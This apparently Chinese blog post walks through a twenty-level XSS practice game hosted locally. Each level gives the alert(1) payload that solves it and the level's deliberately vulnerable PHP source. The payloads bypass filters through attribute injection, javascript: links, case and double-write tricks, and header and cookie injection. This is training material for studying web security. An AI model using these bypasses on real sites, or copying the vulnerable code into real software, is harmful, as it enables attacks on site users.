前言
话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。
xss小游戏在线地址: http://test.ctf8.com/
xss小游戏一共二十关。
为了方便, 我把项目copy在本地。
为了方便实战效果和理解, 本文采用先通关再展示源码的排版方式。
Leve-1
有一个参数name:
再看看name在html源码中的位置:
可以看到位于h2标签中, 故可以直接注入xss攻击:
http://localhost/xss_games/level1.php
?name=<script>alert(1)</script>
点击确定自动location到下一关:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level2.php?keyword=test";
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
Level-2
第二关随便输入一个搜索值:
观察在网页的生成位置:
发现输入的值在input标签中, 我们闭合input标签即可:
http://localhost/xss_games/level2.php
?keyword=hack"><script>alert(1)</script>
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level3.php?writing=wait";
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
Level-3
和上一题一样, 随意输入一个值来观察情况:
继续尝试闭合绕过:
http://localhost/xss_games/level3.php
?keyword=what"><script>alert(1)</script>
&submit=搜索
发现没有闭合出去, 可能是被转义或者编码过,
既然出不去, 那可以在input标签里加属性来xss:
http://localhost/xss_games/level3.php
?keyword=what" onfocus=alert(1)
&submit=搜索
发现还是不对....value值的双引号都没闭合出去。
这里不得其解, 看了下答案, 原来是源码中用了 htmlspecialchars()函数: 过滤一些特殊字符
- htmlspecialchars (string, quotestyle, character-set)
把一些预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号) 成为 &
" (双引号) 成为 "
' (单引号) 成为 ' (默认是不包括单引号的, 要打开)
< (小于) 成为 <
> (大于) 成为 >
其中, quotestyle参数如下:
quotestyle | 可选。规定如何编码单引号和双引号。
|
所以我们用双引号闭合时, 双引号会被转义成HTML实体。
由于htmlspecialchars()函数默认状态是只过滤双引号的, "放过"了单引号, 所以可以用单引号来闭合他:
然后发现还多出一个单引号 (至于为什么, 源码部分会解释), 我们用 // 把它注释掉:
http://localhost/xss_games/level3.php
?keyword=hack' onfocus=alert(1)//
&submit=搜索
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level4.php?keyword=try harder!";
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
看关键部分:
<input name=keyword value='".htmlspecialchars($str)."'>
可以看到, value的值被单引号闭合起来, 至于双引号, 是通过 . (php的字符串连接符)与处理过后的str连接的, 这样才得以在前端的网页中显示出如下效果:
所以实质上我们用单引号闭合就可以往input里加属性了 (类似sql注入), 最后尾部剩下的单引号记得注释掉。
Level-4
测试一下:
继续尝试绕过闭合:
发现< >被过滤了, 这里可以往input标签里加属性使之弹窗: (这里要处理双引号闭合的问题)
http://localhost/xss_games/level4.php
?keyword=test" onfocus="alert(1)
&submit=搜索
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level5.php?keyword=find a way out!";
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level4.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
可以看到, 对str3参数没有作任何过滤, 故直接注入即可。
Level-5
尝试绕过闭合, 加script标签:
发现script被替换成scr_ipt了:
然后用onerror或者onfocus事件也是被替换了, 估计是对关键字on和script做了替换
不过"条条大路通罗马", 可以用<a href=..></a>标签:
http://localhost/xss_games/level5.php
?keyword=hack"><a href=javascript:alert(1)>xss</a>
&submit=搜索
过滤规则只是匹配script, 而javascript刚好可以绕过:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level6.php?keyword=break it out!";
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
可以看到, 服务端将script和on关键字替换了。
Level-6
这关经过测试, 看到和上一关差不多, 尝试<a href=..></a>标签:
发现href被过滤了, 而且script和on关键字也是过滤的。
这里我们发现可以用大小写过滤 (可能是服务端没有进行正则式/i的匹配):
http://localhost/xss_games/level6.php
?keyword=hack"><sCript>alert(1)</Script>
&submit=搜索
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>
可以看到, 代码对script、on、src、data、href关键字进行了过滤, 但没有过滤大小写。
Level-7
尝试绕过双引号闭合, 然后注入script标签:
发现script标签被替换为空了,
这里我们可以采用双写绕过:
http://localhost/xss_games/level7.php
?keyword=hack"><sscriptcript>alert(1)</scscriptript>
&submit=搜索
Level-8
将输入内容添加到友情链接中:
发现被替换了, 并且接下来发现其他的on、src、data、href关键字都被替换了,
双引号也被编码为html实体了:
于是尝试用html实体编码绕过:
发现script标签不能作为url解码后执行:
- JavaScript协议:
javascript:表示执行的是 javascript脚本, 集体执行是什么就是 : 后面的代码。
这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。
格式为, JavaScript:URL
当浏览器装载了这样的URL时,它将执行这个URL中包含的javascript代码,并把最后一条javascript语句的字符串值作为新文档的内容显示出来。这个字符串值可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档完全相同。
所以我们尝试JavaScript协议:
恩, 很棒, script被替换了
继续用html实体编码绕过: (因为JavaScript:URL的URL字符串值可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档完全相同)
http://localhost/xss_games/level8.php
?keyword=javascript:alert(1)
&submit=添加友情链接
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level9.php?keyword=not bad!";
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
Level-9
发现这关和上一关差不多, 继续尝试:
发现不管怎么注入都是提示这个, 应该是采用白名单过滤了,
我们按常理出牌:
发现注入http协议的字段可以成功, 那么我们再注入的xss语句中添加http协议就好了!
http://localhost/xss_games/level9.php
?keyword=javascript:alert(1)/* http://xss */
&submit=添加友情链接
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level10.php?keyword=well done!";
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
}
else
{
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
可以看到, 源码中进行了是否包含http://字段的判断
Level-10
这关可以看到, 我们输入的keyword内容是在h2标题标签中的, 所以即使闭合出来也只是文本而已, 不能被解释执行:
继续观察网页源码, 发现隐藏有参数值:
于是往url加参数:
http://localhost/xss_games/level10.php
?keyword=hack&t_link=1&t_history&t_sort=3
发现只有t_sort被写入了, 所以注入点就是t_sort参数
将value闭合出去 (类似sql闭合), 然后往input标签里加onfocus就行了, 还要记得将type给显示出来:
http://localhost/xss_games/level10.php
?keyword=hack&t_sort=fuck" type="text" onfocus="alert(1)
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level11.php?keyword=good job!";
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
可以明确看到, 源码的确应用了t_sort参数
Level-11
这关我们继续观察到有隐藏标签:
继续给url加参数, 看看哪个参数被写入:
发现还是t_sort参数, 继续闭合绕过:
看到注入的内容没有闭合出去, 应该是被转义或者实体化了,
这里可以对t_ref参数下手, 尝试抓包, 添加Referer参数:
可以看到, 注入点找到了, 并且发现没有对Referer的内容进行过滤:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level12.php?keyword=good job!";
}
</script>
<title>欢迎来到level11</title>
</head>
<body>
<h1 align=center>欢迎来到level11</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level11.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
源码对t_sort进行了防御, 而没有对t_ref防御。
Level-12
这关换汤不换药, 只不过注入点在User-Agent:
继续抓包修改即可:
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level13.php?keyword=good job!";
}
</script>
<title>欢迎来到level12</title>
</head>
<body>
<h1 align=center>欢迎来到level12</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
可以看到, 通过 $_SERVER['HTTP_USER_AGENT']调用了请求头中的User-Agent信息。
Level-13
这关就是cookie的xss注入了:
抓包修改cookie绕过闭合:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level14.php";
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<?php
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level13.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
Level-14
未修复的关卡。(要翻墙)
Level-15
这关比较迷, 没有什么参数传入:
观察网页源码, 发现有一个参数:
但是找不到参数值传入...
(看了源码后, ) 得知传入参数为src:
- ng-include 指令
用于包含外部的 HTML 文件。
包含的内容将作为指定元素的子节点。
ng-include
属性的值可以是一个表达式,返回一个文件名。
默认情况下,包含的文件需要包含在同一个域名下。
- AngularJS中的ng-include:
- 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
- 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
- ng-controller="myCtrl"是不是正确,如果没有对应的controller
- 组件
<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>
fath.html内容:
<head> <meta charset="utf-8"> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script> </head> <body> <div ng-include="'son.html'"></div> <!-- 路径里面必须带上单引号 --> <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错--> </body>
son.html内容:
Hello world
当然了, 我们可以随意包含任意一关卡的php代码, 绕过利用那一关的弹窗完成这关:
http://localhost/xss_games/level15.php
?src='level1.php?name=<img src="" onerror=alert(1)>'
(由于FIrefox跳转不了, 我就用Google Chrome来pass了)
- 源码:
<html ng-app>
<head>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level16.php?keyword=test";
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
可以看到, 传入了scr参数
Level-16
输入的keyword在center中间:
接着, 尝试的其他关键字都没过滤, 特殊字符也被实体化了, (空格都不放过):
那么这里可以参考之前的blog: SQL注入--空格绕过姿势
http://localhost/xss_games/level16.php
?keyword=<img%0asrc=""%0aonerror=alert(1)>
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level17.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level16</title>
</head>
<body>
<h1 align=center>欢迎来到level16</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
</body>
</html>
Level-17
由于我的Firefox版本不支持Swf插件, 所以在Google Chrome上演示:
- <embed>标签
<embed> 标签定义了一个容器,用来嵌入外部应用或者互动程序(插件)。
embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。
支持事件属性;
弹窗方式:
<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>
<embed src=1 onerror=alert(1) width=100% heigth=100%>
<embed src=son.html onmouseover=alert(1) width=100% heigth=100%>
当我们注入属性时:
然后我们就可以用onclick事件来弹窗了:
http://localhost/xss_games/level17.php
?arg01=a&arg02=b onfocus=alert(1)
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
}
</script>
<title>欢迎来到level17</title>
</head>
<body>
<h1 align=center>欢迎来到level17</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
<h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>
Level-18
这关和上一关一样, 用onclick事件:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level19.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level18</title>
</head>
<body>
<h1 align=center>欢迎来到level18</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
</body>
</html>
Level-19
这关继续注入事件:
发现需要闭合双引号出去:
很明显没有闭合成功, 可能是被转义或者HTML实体化了
这里涉及到 flash xss, 参看: Flash XSS检测脚本的简单实现
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level20.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level19</title>
</head>
<body>
<h1 align=center>欢迎来到level19</h1>
<?php
ini_set("display_errors", 0);
echo '<embed src="xsf03.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>
</body>
</html>
Level-20
也是涉及到flash xss
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level21.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level20</title>
</head>
<body>
<h1 align=center>欢迎来到level20</h1>
<?php
ini_set("display_errors", 0);
echo '<embed src="xsf04.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>
</body>
</html>